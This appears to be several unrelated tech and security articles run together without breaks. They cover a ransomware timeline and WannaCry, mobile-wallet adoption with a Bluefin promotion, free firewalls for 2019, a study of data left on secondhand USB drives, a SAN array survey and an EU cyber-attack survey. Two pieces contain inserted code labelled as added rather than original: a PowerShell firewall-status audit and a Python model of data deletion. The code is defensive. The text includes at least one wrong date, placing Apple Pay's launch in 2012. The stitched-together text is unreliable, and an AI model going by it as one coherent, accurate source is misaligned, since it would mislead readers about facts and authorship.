As mentioned, ransomware is not a new concept and has been around for many years. While the timeline below is not an exhaustive list of ransomware, it gives you a good idea of how this form of attack has evolved over time.

1989 – “Aids” Trojan, aka PC Cyborg, becomes the first known case of ransomware on any computerised system.

2006 – After a decade-busting hiatus, ransomware returns en masse with the emergence of Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip, and MayArchive. All are notable for their use of sophisticated RSA encryption algorithms.

2008 – Gpcode.AK arrives on the scene. Utilising 1024-bit RSA keys, it requires a massive effort, beyond the means of most users, to break.

2010 – WinLock hits users in Russia, peppering displays with porn until the user makes a $10 call to a premium rate number.

2011 – An unnamed Trojan locks up Windows machines, directing visitors to a fake set of phone numbers through which they can reactivate their operating systems.

2012 – Reveton informs users their machine has been used to download copyright material or child pornography and demands payment of a ‘fine.’

2013 – The arrival of the now infamous CryptoLocker. Ramping up the encryption level, it is incredibly hard to circumvent.

2013 – Locker turns up, demanding payment of $150 to a virtual credit card.

2013 – Hard to detect, CryptoLocker 2.0 adds the use of Tor for added anonymity for the criminal coder who created it.

2013 – Cryptorbit also adds Tor use to its repertoire and encodes the first 1.024 bits of every file. It also installs a Bitcoin miner to milk victims for extra profit.

2014 – CTB-Locker mainly targets Russia-based machines.

2014 – Another significant development, CryptoWall infects machines via infected website advertisements and manages to affect billions of files worldwide.

2014 – A somewhat more friendly piece of ransomware, Cryptoblocker avoids Windows files and targets files under 100 MB in size.

2014 – SynoLocker targets Synology NAS devices, encrypting every file it finds on them.

2014 – TorrentLocker utilizes spam emails to spread, with different geographic regions targeted at a time. It also copies email addresses from the affected users’ address book and spams itself out to those parties as well.

2015 – Another hard-to-detect piece of ransomware, CryptoWall 2.0 uses Tor for anonymity and arrives in a number of different ways.

2015 – TeslaCrypt and VaultCrypt can be described as niche ransomware in that they target specific games.

2015 – CryptoWall 3.0 improves on its predecessor by coming packaged in exploit kits.

2015 – CryptoWall 4.0 adds another layer to its encryption by scrambling the names of the encrypted files.

2015 – The next level of ransomware sees Chimera not only encrypt files but also publish them online when ransoms are not paid.

2016 – Locky arrives on the scene, named primarily because it renames all your important files so they have a .locky extension.

2016 – Located on BitTorrent, KeRanger is the first known ransomware that is fully functional on Mac OS X.

2016 – Named for the Bond villain in Casino Royale who kidnaps Bond’s love interest to extort money, the LeChiffre program takes advantage of poorly-secured remote computers on accessible networks. It then logs in and runs manually on those systems.

2016 – Jigsaw will encrypt and then delete files progressively until the ransom is paid. After 72 hours, all files will be deleted.

2016 – SamSam ransomware arrives complete with a live chat feature to help victims with their ransom payment.

2016 – The Petya ransomware utilizes the popularity of cloud file sharing services by distributing itself through Dropbox.

2016 – The first ransomware worm arrives in the form of ZCryptor, which also infects external hard drives and flash drives attached to the machine.

2017 – Crysis targets fixed, removable, and network drives, and uses powerful encryption methods that are difficult to crack with today’s computing capabilities.

2017 – WannaCry is spread through phishing emails and over networked systems. Uniquely, WannaCry uses a stolen NSA backdoor to infect systems, as well as another vulnerability in Windows that was patched over a month before the release of the malware (more details below).

WannaCry ransomware

The WannaCry ransomware is probably the most infamous in recent years, mainly due to the sheer number of computers it affected. It quickly became the fastest-spreading ransomware in the history of ransomware, affecting 400,000 machines in its wake. Generally speaking, WannaCry is not particularly unique; it stands out because it infected some very big names and important government agencies across the world, and used a stolen National Security Agency (NSA) exploit tool to do it.

The stolen NSA tool is part of the reason WannaCry was so successful in spreading. Compounding the issue is the fact that many agencies and businesses were slow to roll out the proper Windows patch that would have prevented this exploit in the first place. Microsoft pushed that patch in mid-March 2017 but WannaCry didn’t start infecting systems until May.

Interestingly, the first variant of WannaCry was thwarted by a cyber security researcher and blogger who, while reading the code, discovered a kill switch written into the malware. WannaCry’s first variant checks to see if a certain website exists or not, the result determining whether or not it continues.

The security blogger decided to go ahead and register the site for around $10, which significantly slowed the spread of the virus. However, WannaCry’s creators were quick to roll out new variants (one of which had another website kill switch that was soon used to stop that variant).

In total, it’s estimated that WannaCry netted its creators around $140,000 worth of bitcoin. While this is no small sum, it’s nowhere near the estimated $325 million earned by those behind the Cryptowall Version 3 ransomware in 2015. This may be due to better education on ransomware or failings in the virus, but with the number of users affected, it seems things could have been worse.

Mobile Wallets – Still Not Living Up to Expectations


Ever since the birth of Apple Pay in 2012, payment experts have declared that we are living in “the year of the mobile wallet.” But digital wallet adoption rates have remained static for years. While a small group of consumers have embraced this new technology, many Americans seem perfectly happy continuing to use cards and cash for their purchases.

A Slow Start for Wallets

While iPhones may still be enjoying good sales, Apple Pay, the country’s largest mobile payment player, is not seeing record-setting numbers. According to statistics from PYMNTS.com, less than 3% of iPhone users paid with the app during their most recent shopping trip – and only 6.8% of all iPhone owners used Apple Pay the last time they went to a store that accepted it.

Walmart Pay has also seen a similar adoption rate, with 5.9% of eligible adults using it during their last trip to Walmart. Samsung Pay has a usage rate of 4.6%, and consumers used Android Pay for 2.3% of all recent transactions. And perhaps most telling, in 2017, less than 1 in 20 consumers with a mobile wallet used it when they had the opportunity.

Mobile Woes

Why are consumers hesitant to pay via phone? For the most part, many consumers are perfectly happy to pay with cash and their cards and don’t feel the need to switch.

And unlike Visa or MasterCard, mobile wallets are hardly universal. Apple Pay, Android Pay and Samsung Pay are restricted to their respective devices. Walmart Pay has a higher overall usage rate because it can be accessed by anyone with a smartphone. For many consumers, switching between mobile wallets based on where they’re shopping creates unnecessary payment friction.

Still, as smartphones and internet connectivity reach a saturation point, consumers will likely start to view their phones more as banking and shopping devices. Mobile wallet transactions topped out at $718 billion in 2017. However, experts do expect that mobile payments will reach $800 billion this year, as Apple, Google, Samsung and PayPal increase their focus on mobile payments, and merchants ramp up their mobile capabilities.

One Wallet to Rule Them All

While the mobile wallet market is increasingly fragmented, the wallet that might stand the best chance of growth is PayPal, since it is not connected to a single payment brand. Along with its partnership with Venmo, PayPal represents the closest to a universal mobile wallet. Other global standouts include China’s Alipay and WeChat Pay.

The world will also see an increase of QR code-based, contactless mobile payment options like those seen from retailers like Walmart, CVS and Starbucks, as well as NFC-based mobile payments. There is a possibility that Walmart could expand its wallet app beyond its stores, while Amazon could venture into the mobile payments market.

While today’s mobile wallet market is fragmented and competitive, an increase in corporate acquisitions in 2019 will clear the way for a few top players who acquire and eliminate rival services.

Payments of the Future

When it comes to the growth of mobile wallets, the primary obstacle is bridging the gap between awareness and adoption. And while the future of money is increasingly mobile, security will always be the top priority of any payment system.

That’s why Bluefin offers our P2PE and tokenization solutions to ensure that sensitive payment data is encrypted the moment it enters your system – and is encrypted if you store payment data. To learn more about how you can protect your organization’s payment information, contact a Bluefin representative today.

Best Free Firewalls for 2019

While you might think it’s fine to rely on the firewalls built into your wifi router and device operating system, these may not be enough. Don’t worry if you don’t have spare cash for additional firewall software; we’ve found some great free firewalls for you to consider.

If you have a wifi router, you likely already have a measure of protection from intrusion in the form of a built-in hardware firewall. Additionally, you may have a software firewall built into your operating system, such as Windows Defender for Windows users. According to the AV Test Security Report 2017/2018, Windows is by far the most attacked operating system, so built-in protection makes sense.

However, these firewalls aren’t perfect and you may find yourself in need of extra protection. And it’s not just Windows users who should be concerned. No operating system is immune to attack, so no one should be complacent about the vulnerability of their internet-connected devices.

Installing antivirus software as well as an additional firewall is your best chance of keeping your equipment malware-free. Thankfully, you don’t have to break the bank when it comes to third-party software, or even pay a penny. We’ll cover each firewall in detail, but if you’re just looking for a quick list, these are the best free firewalls:

  1.  Sophos XG Firewall Home Edition
  2.  ZoneAlarm Free Firewall 2019
  3.  AVS Firewall
  4.  Avast Free Antivirus
  5.  Comodo Free Firewall
  6.  TinyWall
  7.  Outpost Firewall
  8.  GlassWire
  9.  Privatefirewall
  10. OpenDNS Home

The following sections will explain what each of these has to offer:

The Best Free Firewalls of 2019

You don’t need to pay for a top quality firewall because some of the leading cybersecurity companies produce free software that will protect your computer.

Here’s our list of the best free firewalls for 2019:

1. Sophos XG Firewall Home Edition

Sophos is a rising star in the cybersecurity industry and its excellent business protection software is also available for home use. This security system is unusually advanced compared to the standard firewall software. It isn’t just a computer security system, it is a network security system.

Given that most homes now run multi-user wifi networks, the Sophos approach to whole home cybersecurity coverage is a concept that is long overdue. Essentially, you get all of the system protection controls that you would for a business, but for your home network.

That being said, there is a major infrastructure requirement of this free firewall that may put you off. Sophos XG has its own operating system (OS) and when you install it on a computer, it wipes out the existing OS and all software installed on that device. You won’t even be able to reinstall your Windows-compatible software once the Sophos XG OS is running. The host computer needs to have four cores and 6 GB of RAM.

If you have a spare computer, then this firewall option is light years ahead of the competition. It includes anti-malware, and gives you web security, connection privacy, and URL filtering. Within the network, you get application control, an Intrusion Prevention System (IPS), and traffic-shaping features. The console includes a network monitoring and reporting dashboard, providing all the system management facilities that large companies enjoy on their networks.

Download Sophos XG Firewall Home Edition

2. ZoneAlarm Free Firewall 2019

ZoneAlarm Free Firewall installs on Windows 7, 8, 9, and 10. This system has some great extras, which makes it a good choice for home wifi networks and laptops that connect to the internet in public places. All you need to install it is an internet connection for the download and an email address for the activation.

The firewall includes a “stealth mode” which protects your connections from hackers, includes identity protection services, and blocks malware. If you are in the US, you can call on the company for victim recovery assistance in the case of identity theft.

The software will add an extra layer of protection to your connections when you connect to public wifi hotspots and it assesses the security of your home wifi network to improve protection from attacks. It updates itself automatically, so you benefit from an up-to-date threat protection database.

Download ZoneAlarm Free Firewall

3. AVS Firewall

The AVS brand is owned by Online Media Technologies Ltd. However, the company doesn’t make its firewall software easy to find on its website. Alternatively, you can download it from Tucows or Softpedia among other free software distribution sites. This firewall runs on all versions of Windows from XP to Windows 10.

The firewall will block incoming connection requests and it includes other security measures. These include the ability to select which applications on your computer are allowed to connect to the internet and a security level feature. The software monitors activity in the registry and blocks alterations. This is a very important protection measure against worms and persistent malware.

The AVS Firewall provides surfing protection as well as system security. These measures include an ad and popup blocker and parental controls. You can allocate bandwidth usage limits to devices, applications, or programs.

Download AVS Firewall

4. Avast Free Antivirus

Avast is a major player in the antivirus market and its AV software packages include firewalls. The company produces a free antivirus package that will give your home computer complete protection from cyber attacks. This software runs on Windows, MacOS, and Android.

The antivirus module of this package includes live updates for the threat database which gives you instant coverage when the company discovers a new virus. The software also creates a Sandbox environment on your computer. This is useful if you like to download new software from untrusted sources as you can try out your new utility without the risk of it releasing hidden viruses onto your computer.

Wifi security in this package monitors for intruders and network weaknesses, and online protection includes a password locker and fake site detection that guards against DNS hijacking.

Download Avast Free Antivirus

5. Comodo Free Firewall

Comodo is an award-winning cybersecurity software house that produces a firewall for all versions of Windows from XP through to Windows 10. The paid firewall has a free alternative, which the company claims is the world’s #1 free firewall.

As well as blocking incoming connections, this software package will monitor your computer for ongoing threats, with a constantly updated threat database. The monitor alerts you in real-time to detected risks. You get a Sandbox environment for any new software you download to protect from hidden viruses. The system uses AI to build up a profile of normal operating behavior on your computer so that it can block suspicious activity. You can choose to block specific applications from accessing the internet while the software monitors all outgoing traffic as well as inbound data.

Other features include a browser cleanup utility and a games mode to enable interactive applications to operate over the internet.

Download Comodo Free Firewall

6. TinyWall

The developer of TinyWall, Károly Pados, came up with the clever idea of producing an enhancement for the native Windows firewall, Windows Defender. So, unsurprisingly, this utility is only available for Windows.

The ethos behind the development of TinyWall is that it should be unobtrusive. The program runs all the time and shows as an icon in the system tray. You click on the icon to view the popup menu of the system. This means that threat information is available on demand. The good point about that is that you won’t get your computer frozen by an overlay when you are in the middle of something. However, on the downside, threat alerts are easy to ignore, which is a risk.

As a free utility that’s meant to be lightweight (it only takes up 1 MB of space on your hard drive), this firewall doesn’t have many features. You can whitelist applications to prevent your important programs from being blocked, but that’s about it.

Download TinyWall

7. Outpost Firewall

The maker of Outpost, Agnitum Ltd, was sold to Yandex, the Russian Google, in 2017 and at that point shut down its own website. You can’t get this firewall directly from the company anymore, but it is available from software distribution sites, such as Filehippo and Softonic.

You might wonder why a seemingly abandoned firewall is on this list. It’s here because it deserves to be. Agnitum licensed its firewall to other security companies, so this is actually the firewall that you get from other big name cybersecurity providers, including Sophos. Although the paid Outpost Firewall Pro is no longer supported, the free firewall is still going strong.

Features of this excellent security utility include automatic whitelisting for well-known software, an anti-leak module that blocks suspicious outgoing messages, a file and folder lock, and an ad and popup blocker for web surfers.

Download Outpost Firewall

8. GlassWire

GlassWire is network monitoring software as well as a firewall, and it’s free to use. This package installs on Windows 7, 8, and 10. Although this software would be ideal for a small business network, it’s also marketed for home use. The firewall can be set up with several profiles so it behaves differently in each given scenario. For example, you can have a home network setting and a public wifi profile.

As well as blocking incoming connections, the suite enables you to monitor bandwidth usage, throttling some apps to make more bandwidth available to key applications. The traffic management functions go down to port number, program, and process.

The monitor is always on and it tracks all activity on your computer, looking for anything suspicious. Like TinyWall, the firewall functions of GlassWire are actually just a management interface to the native Windows Defender.

Download GlassWire

9. Privatefirewall

Privatefirewall is a product of Privacyware. The company’s feature product is ThreatSentry, a security system designed for business networks. The company is not so interested in Privatefirewall anymore and it doesn’t even mention the product on its own website. However, you can download it for free from software distributors, such as CNet and Softpedia. The program will run on Windows from XP up to 8.1 – there isn’t a version for Windows 10.

As well as being a firewall, this utility is a host-based intrusion detection system. It examines the log files on your computer to look for worrying events. It will also protect those log files from unauthorized alteration or deletion, which is a track-covering trick that some malware uses.

The regular firewall features of this suite include whitelisting and blacklisting functions, as well as content privacy controls such as text copy shutdown and clipboard monitoring. The interface for the firewall is a popup context menu that you activate by right-clicking on the program icon in the system tray.

The tool will also monitor email activity, disable infected or banned websites from loading, and block internet activity from a specified address.

Download Privatefirewall

10. OpenDNS Home

OpenDNS is a business network security system that also has a free Home edition. This firewall covers all of the internet-active devices in your home, including DVRs and smart TVs, computers, tablets, and smartphones. It’s a great choice for families because it includes parental controls.

This system is cloud-based, so you don’t have to install any software. Instead, the service changes your router settings to channel all of your internet traffic through the OpenDNS server. This is what the industry calls an “edge service” and it will also protect you from other hacker actions, such as DDoS attacks.

Sign up for OpenDNS Home

Do I need a third-party firewall?

Businesses religiously install firewalls to protect their resources from attack, but the general public has become less interested in this form of protection. A big reason for this complacency is that protection is often built in to devices.

At home, wifi routers offer protection against attack from the internet in the form of a hardware firewall. However, the advent of Trojans means that this incoming connection request block is no longer enough; Trojans will open up outgoing connections back to base and invite in other viruses.

Popular operating systems often come with their own software firewall, such as Windows Defender in newer versions of Windows. However, this is a rudimentary firewall that could do with a lot more options, which you get with third-party firewalls.

Note that if you do have firewalls built in to your router or operating system, you need to make sure they’re enabled. A disabled firewall is as useless as not having one at all.
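
One way to confirm that the built-in Windows firewall is actually enabled, as an added example that is not part of the original article. The function name `Get-FirewallProfileAudit` is hypothetical; the cmdlets it calls ship with Windows 8 and later.

```powershell
# Added example: audit the built-in Windows firewall profiles.
# Reads the effective settings (ActiveStore), which include any Group Policy
# overrides, so the result reflects what is really enforced on this machine.

function Get-FirewallProfileAudit {
    Get-NetFirewallProfile -PolicyStore ActiveStore | ForEach-Object {
        $enabled        = ([string]$_.Enabled -eq 'True')
        $inboundAllowed = ([string]$_.DefaultInboundAction -eq 'Allow')

        if (-not $enabled) {
            $finding = 'Firewall is OFF for this profile'
        } elseif ($inboundAllowed) {
            $finding = 'Unsolicited inbound connections are allowed by default'
        } else {
            $finding = 'OK'
        }

        [pscustomobject]@{
            Profile        = $_.Name                       # Domain, Private or Public
            Enabled        = $enabled
            DefaultInbound = [string]$_.DefaultInboundAction
            Finding        = $finding
        }
    }
}

$audit = Get-FirewallProfileAudit
$audit | Format-Table -AutoSize | Out-Host

$problems = @($audit | Where-Object { $_.Finding -ne 'OK' })
if ($problems.Count -gt 0) {
    Write-Warning ("{0} firewall profile(s) need attention." -f $problems.Count)
    Write-Warning 'To switch all profiles back on, run from an elevated prompt:'
    Write-Warning '  Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True'
} else {
    Write-Host 'All firewall profiles are enabled and block unsolicited inbound traffic.'
}
```

If one of the third-party firewalls above is installed, it may take over from the Windows firewall, so confirm a disabled profile against that product's own status before changing it.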

Two-thirds of secondhand USB drives still contain previous owners’ data: study

68 percent of secondhand USB flash drives sold in the US, and 67 percent sold in the UK, still contain recoverable data from their previous owners, according to a new study by the University of Hertfordshire and commissioned by Comparitech.

University of Hertfordshire researchers purchased 200 USB memory sticks—100 in the US, 100 in the UK—from eBay, secondhand shops, and traditional auctions. Our latest research sought to find out how many of the USB drives still contained data, what was contained in that data, and whether any attempt had been made to remove the data.

Two-thirds of USB drives still contained remnant data from previous users. Within them, researchers discovered a wide range of intimate, private, and sensitive files. Nude photos, business documents, ID scans, job applications, wage slips, private memos, tax statements, receipts, and medical documents were found among the trove of data.

The data recovered from secondhand USB drives could be used for a wide range of crimes, including targeted phishing, identity theft, and extortion. “One of the criteria that the study applied to the recovered data was to ask ‘would this data be of value to a cybercriminal?’” says Andrew Jones from the Cyber Security Centre at the University of Hertfordshire. “If a person can be identified in sufficient detail (name, address, email, phone number), then this information has potential value to a criminal for identity theft.”

Researchers conducted their analysis using publicly available software that can be downloaded from the web.

The research team split up the results by country. Here’s a breakdown of the 100 cards from the US:

  • Only one USB drive appeared to have no attempt made to remove the data
  • 18 were wiped using a data erasing tool and no data could be recovered
  • Eight were formatted, but data could be recovered “with minimal effort”
  • 64 had data deleted, but it could easily be recovered
  • 6 drives were not accessible and could not be read using the tools available
  • The previous owner could be identified in 20 cases

… and the 100 from the UK:

  • 19 had no attempt made to remove the data
  • One was encrypted with BitLocker (not recoverable)
  • 16 were properly wiped and no data could be recovered
  • 16 were formatted, but data could still be recovered “with minimal effort”
  • 47 had data deleted, but it could be easily recovered
  • 1 was not accessible and could not be read
  • The previous owner could be identified in 22 cases

The biggest difference between the two countries was the number of drives sold without having had any attempt made to erase data beforehand. The study notes, “In the USA, there appears to be a greater level of awareness of the issue and only one of the purchased USB memory sticks had not had any effort made to remove the data, whereas in the UK there were 19.”

Despite Americans’ greater efforts to remove data from USB drives before selling them, the proportion of USB flash drives from which data could be recovered was almost equal in the UK and the USA at 68 percent and 67 percent, respectively.

This study concurs with our similar study by the same university on secondhand memory cards, such as SD and microSD cards. That research, carried out in conjunction with Comparitech last year, found that 65 percent of secondhand memory cards still contained personal data from their previous owners.

What did the USB drives contain?

Researchers noted that the types of data found on USB flash drives varied somewhat by country. Americans’ USB sticks contained more business documents, while those in the UK contained more personal information.

The risks of leaving data on secondhand USB flash drives and memory cards seem obvious, so what researchers found on some of the USB flash drives might surprise you. Some notable cases include:

  • Nude images of a middle-aged man along with name and contact details
  • A collection of photos of bundles of money and shotguns, a search warrant giving the name of the person to be searched, a forfeiture submission for the seizure of drugs giving the name of the person that had their property seized, a forensic laboratory report on evidence submitted, and a letter of resignation from a law enforcement officer
  • Chemical, fire, and power safety documents for a project in Cardiff, along with risk assessment documents and the name of the owner
  • Laboratory reports for a petrochemical company, along with the name and National Insurance number (SIN) of the USB drive’s owner
  • Documents containing the stock exchange dealings of a trader along with their passport and addresses in France in the UK for the past six years
  • Wage slips and tax statements with name, address, and contact details
  • Photos of a soldier including a deployment screening sheet containing his home and duty addresses
  • A resume and filled-out W-4 tax form with full name and address

Why do people leave data on secondhand USB drives?

The cause of this problem is twofold, according to the research:

  • First, not enough people are aware of the risks of leaving data on USB drives before selling them.
  • Second, those that do make an effort to erase the data don’t do it properly, so the data can still be recovered.

Jones tells Comparitech, “There are a number of solutions that are already easily and freely available, such as media wiping tools, encryption, and the low level formatting of the media, but this is more an issue of the user not being aware that even though they cannot see it, the data does not go away when they delete it or do a high level format.”

Simply dragging files into the trash can or highlighting them and hitting the “Delete” key does not permanently erase data from a USB drive. Similarly, formatting a USB drive still leaves recoverable remnant data. To fully erase data, the storage area containing it must be overwritten, preferably by secure data erasure software. Read our guide on how to securely erase SD cards and flash drives to learn more.

The onus of responsibility is on both previous owners and secondhand sellers. It’s quite possible that sellers simply plug in the USB drive, see that it’s empty, and put it up for sale without bothering to properly wipe remnant data.

The tools required to properly wipe a device are often free and even built into device operating systems. The authors of the study note that there’s plenty of free and publicly available information out there (including ours) saying as much, but it apparently never reached many sellers of secondhand devices. Researchers suggest one reason might be that USB memory sticks are fairly cheap and therefore sellers, perceiving them as low value, do not consider the potential value of the data they contain.

In some cases, online sources erroneously suggest wiping devices using a “Quick Format” on Windows, which leaves recoverable remnant data on devices. A full format is necessary to completely overwrite remnant data.
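To make the difference between deleting, quick formatting and overwriting concrete, here is an added example (not from the study or from Comparitech) that models a drive as a directory over raw blocks and audits what remains after each method. The ToyDrive class, its method names and the sample file contents are constructed for illustration and do not represent any real filesystem.

```python
BLOCK = 512      # bytes per block in the toy drive
NBLOCKS = 64     # total blocks on the toy drive


class ToyDrive:
    """Constructed model: a directory (what a file browser shows) over raw blocks."""

    def __init__(self):
        self.raw = bytearray(BLOCK * NBLOCKS)   # the storage area itself
        self.directory = {}                     # name -> (first block, length in bytes)
        self.next_free = 0

    def write_file(self, name, data):
        needed = -(-len(data) // BLOCK)         # ceiling division
        if self.next_free + needed > NBLOCKS:
            raise ValueError("drive full")
        start = self.next_free * BLOCK
        self.raw[start:start + len(data)] = data
        self.directory[name] = (self.next_free, len(data))
        self.next_free += needed

    def delete(self, name):
        # "Delete" only drops the directory entry; the blocks keep their bytes.
        del self.directory[name]

    def quick_format(self):
        # A quick format writes a fresh, empty directory and nothing else.
        self.directory = {}
        self.next_free = 0

    def overwrite_all(self):
        # Overwriting replaces every byte of the storage area with zeros.
        self.raw[:] = bytes(len(self.raw))
        self.quick_format()


def remnant_blocks(drive):
    """Blocks that still hold non-zero bytes but belong to no listed file."""
    live = set()
    for first, length in drive.directory.values():
        live.update(range(first, first + -(-length // BLOCK)))
    zero = bytes(BLOCK)
    return [i for i in range(NBLOCKS)
            if i not in live and drive.raw[i * BLOCK:(i + 1) * BLOCK] != zero]


def audit(drive, marker):
    """Pre-sale check: what the owner sees versus what is still on the media."""
    return {"listing": sorted(drive.directory),
            "remnant_blocks": remnant_blocks(drive),
            "marker_found": marker in drive.raw}


def demo():
    marker = b"PAYSLIP-CONSTRUCTED-SAMPLE"          # constructed sample content
    results = {}
    for method in ("delete", "quick_format", "overwrite_all"):
        drive = ToyDrive()
        drive.write_file("payslip.txt", marker * 40)            # 1040 bytes, 3 blocks
        drive.write_file("notes.txt", b"constructed note\n" * 10)  # 170 bytes, 1 block
        if method == "delete":
            drive.delete("payslip.txt")
            drive.delete("notes.txt")
        else:
            getattr(drive, method)()
        results[method] = audit(drive, marker)
    return results


if __name__ == "__main__":
    for method, result in demo().items():
        print(method, result)
```

In all three cases the listing is empty, which is what a seller sees when plugging the drive in; only the overwrite leaves no remnant blocks. The model does not represent flash wear levelling, where the controller can keep copies in blocks the host cannot address.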

Despite proper data destruction being easy and information about it being prevalent, people still fail to do it. The researchers say the causes might be a lack of understanding of how to properly delete data, a lack of concern in an era of social media and data sharing, or a failure to understand the risks of exposing personal data.

“There have been efforts by Government and a number of other organisations to educate users, but these are not having a significant effect,” Jones explains. “This is probably due to people not considering the effect of aggregation of data on the media over time and that a number of individual elements of data that appear to have no value can be viewed as a whole to develop a rich picture of the user.”

Portable storage

The storage capacity of the drives used in our study varied widely, from a mere 64 MB to 128 GB. The study says USB memory sticks are primarily used to move files from one computer to another, or as a form of backup storage. That means any files stored on USB flash drives were purposely stored there, which is slightly different than data stored on a computer hard disk.

Although storage demand continues to grow, that storage won’t necessarily exist on end user devices in the long term. As broadband speeds increase and memory gets cheaper to manufacture, remote cloud storage and online file transfers could mitigate the amount of personal data we put on USB flash drives.


Enterprise and midrange SAN survey 2019: Hitachi, IBM, and NetApp

Part two of two: While all-flash is mainstream, NVMe is an option as disk replacement for most suppliers, while NetApp leads the way with NVMe end-to-end to hosts

As noted in the first piece, the key products of the big five storage array makers – Dell EMC, HPE, Hitachi, IBM, and NetApp – are primarily offered as all-flash storage, with hybrid flash and spinning disk as options too.

However, we noted that flash is where the key boundaries of innovation lie, with non-volatile memory express (NVMe) flash drives available in high-end enterprise arrays from Dell EMC, IBM and NetApp, with only HPE bucking the trend by using NVMe as connectivity for storage-class memory as a cache layer – this is set for inclusion in Dell EMC’s Powermax high-end arrays too.

Standard spec/features include input/output per second (IOPS) that run into the millions and capacities that go to several tens of petabytes (PB) or beyond, Fibre Channel and iSCSI connectivity to hosts, with mainframe connectivity in a small number of products (notably from IBM and Hitachi in this article, plus Dell EMC in the first). Dual controllers, replication, snapshots, encryption, thin provisioning and data reduction are also common to most.

As mentioned, when it comes to the cloud, all the array makers have some way of using the cloud as a tier, which we have looked at here.

In this article, we’ll look at Hitachi’s VSP F- and G-series, IBM’s FlashSystem, StorWize and DS arrays, plus finally NetApp’s AFF/FAS, Solidfire and E/EF-series.

The accompanying piece examined Dell EMC’s VMAX/PowerMax, Xtremio, Unity, SC, and PowerVault ME4 products, plus HPE’s 3PAR and Nimble arrays.

Hitachi

Hitachi Vantara’s VSP F-series all-flash enterprise SAN storage comes in three models: the F700, F900 and F1500. These are claimed to deliver 1.4, 2.4 and 4.8 million IOPS respectively.

They are enterprise-scale storage area network (SAN) arrays with capacity for 864, 1,152, and 2,304 drives respectively, which gives a raw maximum capacity of between 6PB and 8PB.

For the two smaller arrays, connectivity is via 16Gbps or 32Gbps Fibre Channel or iSCSI with 10Gbps Ethernet. The F1500 has Fibre Channel plus (mainframe) FICON, both at 8Gbps and 16Gbps, plus Fibre-Channel-over-Ethernet at 10Gbps.

A pair of midrange F-series arrays – the F350 and F370 – offer a claimed 600,000 IOPS and 1.2 million IOPS with 192 or 288 drive slots for maximum raw capacity of 2.8PB or 4.3PB. Connectivity is 16Gbps and 32Gbps Fibre Channel plus 10Gbps iSCSI/Ethernet.

Meanwhile, the VSP G350, G3700 and G900 hybrid flash arrays range from entry-level maximum capacity of a couple of PB to 35PB, depending on the drives used, which can be a mixture of 2.4TB and 6TB spinning disk as well as up to 15TB flash.

Performance ranges from 600,000 IOPS to 4.8 million. Connectivity is similar to the F-series, with mainframe connectivity in the G1500 top-of-the-range model.

IBM

FlashSystem: IBM’s FlashSystem products all come with TLC flash drives. The V9000 scales out to eight controllers and disk shelves, or from 43TB to 1.7PB, with IOPS of between 1.3 million and 5.2 million. Connectivity is up to 16Gbps Fibre Channel and 10Gbps iSCSI and Fibre Channel-over-Ethernet.

The V9100 comes with NVMe modules and claims between 2.5 million IOPS and 10 million IOPS for a clustered configuration.

Meanwhile, the FlashSystem A9000 offers TLC flash capacity from just over 100TB up to 1.2PB (both are effective, not raw figures) with up to 900,000 IOPS.

The FlashSystem A9000R comes in three size configurations: 72TB to 144TB, 170TB to 340TB, and 360TB to 720TB – all raw capacities. IOPS is 2.4 million for all three and connectivity is Fibre Channel and iSCSI to 16Gbps and 10Gbps respectively.

The FlashSystem 900 offers 13TB per 2U box with 1.1 million IOPS read-only, and around 800,000 IOPS with 70/30 read/write.

StorWize: IBM’s StorWize V5030F can house up to 760 drives (or double that in a clustered configuration), which, with 15TB flash drives, makes for around 22PB maximum capacity. IBM Spectrum Virtualize software (formerly SAN Volume Controller) allows for storage virtualisation across disparate devices.

StorWize V7000F scales up to 3,040 drives, making for about 44PB raw capacity.

Minus the F suffix, StorWize provides hybrid flash array functionality.

DS series: IBM’s DS8000F series are its all-flash arrays aimed at mainframe use cases. There are three models that come in different capacities up to 1.2PB and connectivity via 8Gbps and 16Gbps Fibre Channel and FICON.

The DS8880 is IBM’s hybrid flash SAN array family, which comes in capacities up to about 5PB, of which approximately one sixth – in terms of drive bays/card slots – can be solid state. Once again, the DS brings mainframe compatibility.

NetApp

AFF/FAS: NetApp’s AFF series – All-Flash FAS – come in five models that scale from clusters of two to 24 nodes (12 HA pairs) with maximum effective capacities that run up to 700-plus TB per node and the low hundreds of PB (after data reduction) in maximum-sized clusters. Out of these the AFF800 is NVMe-equipped, and offers latency under 200µs with claimed end-to-end NVMe connectivity, including over Fibre-Channel.

NetApp’s FAS line continues as a set of hybrid flash arrays, with the FAS2700, 8200 and 9000 series. The SME/mid-size 2700 starts at 10TB and can scale to 17PB in a 24-node cluster. The 9000 scales to 176PB.

Solidfire: The Solidfire all-flash storage product that NetApp acquired in 2015 comes in a 1U form factor and three models, the H610S-1, H610S-2 and H610S-4.

They each hold 12 flash drives of 960GB, 1.92TB or 3.84TB for total capacity of 11.5TB, 23TB or 46TB.

With data reduction – data deduplication, compression and thin provisioning – effective capacity is upped by between 3x and 9x.

Solidfire started out targeted at cloud service providers and is Fibre Channel and iSCSI block storage.

EF- and E-series: NetApp’s E-Series arrays date back to NetApp’s acquisition of Engenio in 2011, whose arrays were designed for spinning disk. They run the SanTricity operating system, which is a legacy of that pedigree.

There are two all-flash arrays in the series, the EF280 and EF570, which offer 300,000 IOPS and 1 million IOPS respectively in hardware for 96 and 120 drives, plus maximum raw capacity that goes up to around 1.5PB with expansion shelves.

Meanwhile, there are two spinning disk E-series arrays, the E5724 and the E5760, with 24 and 60 drives respectively. The E5724 can scale to 120 flash drives and 180 HDDs, while the E5760 can accommodate 120 and 480 of each.


More than half of EU firms report cyber attack losses

More than half of European firms admit business disruption and data loss due to cyber attacks in the past 24 months, with UK firms among the most targeted, a survey shows

One in five IT decision-makers claimed cyber attackers left no clue to their identity, while 54% said they had faced at least one attack in the past two years that resulted in some sort of disruption, a survey has revealed.

This disruption was in the form of service disruption (31%), data integrity issues (18%) and data loss (15%), according to the poll of nearly 2,000 European firms by security firm Kaspersky Lab.

Organisations in the UK and Spain faced the highest risks, the survey found, with 64% of respondents confirming they had been hit by cyber attacks in the past two years.

Despite traditionally having bigger IT budgets than small businesses, 64% of enterprises said they had been hit by a cyber attack that caused some disruption, in contrast to just 45% of small and medium-sized businesses.

The survey confirmed that cyber attacks were not diminishing, with more than one in five respondents (21%) saying the number of cyber attacks on their business had increased in the past 12 months, compared with the previous year, while for 42% it had stayed roughly the same.

